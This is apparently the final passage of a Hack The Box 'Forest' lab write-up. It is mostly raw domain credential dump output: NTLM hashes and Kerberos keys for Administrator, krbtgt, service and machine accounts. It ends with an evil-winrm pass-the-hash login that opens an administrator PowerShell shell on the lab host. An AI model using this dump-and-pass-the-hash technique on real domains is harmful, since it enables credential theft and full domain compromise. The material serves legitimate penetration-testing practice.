htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b::: htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7::: htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072::: puck:9601:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040::: FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:80999de0dddffb9be58424af7aa12696::: EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1::: [*] Kerberos keys grabbed htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913 htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375 htb.local\Administrator:des-cbc-md5:c1e049c71f57343b krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58 krbtgt:des-cbc-md5:9dd5647a31518ca8 htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4 htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983 htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91 htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8 htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81 htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6 htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5 htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2 htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29 htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7 htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538 htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702 htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352 htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701 htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36 htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3 htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054 htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161 htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a htb.local\sebastien:des-cbc-md5:702a3445e0d65b58 htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5 htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32 htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6 htb.local\andy:des-cbc-md5:a2ab5eef017fb9da htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6 htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81 htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9 htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427 htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25 htb.local\santi:des-cbc-md5:4075ad528ab9e5fd puck:aes256-cts-hmac-sha1-96:06e262b4631831eb9e36337f221a12ef9002d822111e2cf0b6986677b43de401 puck:aes128-cts-hmac-sha1-96:b36d7c9f29063935479a113ac05ce4f7 puck:des-cbc-md5:d97915c119025dd9 FOREST$:aes256-cts-hmac-sha1-96:667d61b318e1302ef1861f3dfe5f89ef1d737f7f277da9841f64dc6b49de811b FOREST$:aes128-cts-hmac-sha1-96:2376f9c19c4bb9a61f7008ecb735af41 FOREST$:des-cbc-md5:15bffbfb9dcb2c51 EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6 EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e EXCH01$:des-cbc-md5:8c45f44c16975129 [*] Cleaning up... ┌─[puck@parrot-lt]─[~/htb/forrest]
.
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Author: Puckiestyle